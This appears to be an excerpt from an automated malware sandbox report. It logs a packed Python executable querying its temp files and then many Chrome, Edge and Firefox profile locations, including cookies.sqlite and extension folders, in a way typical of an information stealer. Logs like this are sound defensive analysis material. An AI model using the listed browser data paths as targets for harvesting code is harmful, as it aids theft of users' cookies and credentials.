              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\unicodedata.pyd VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation
Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
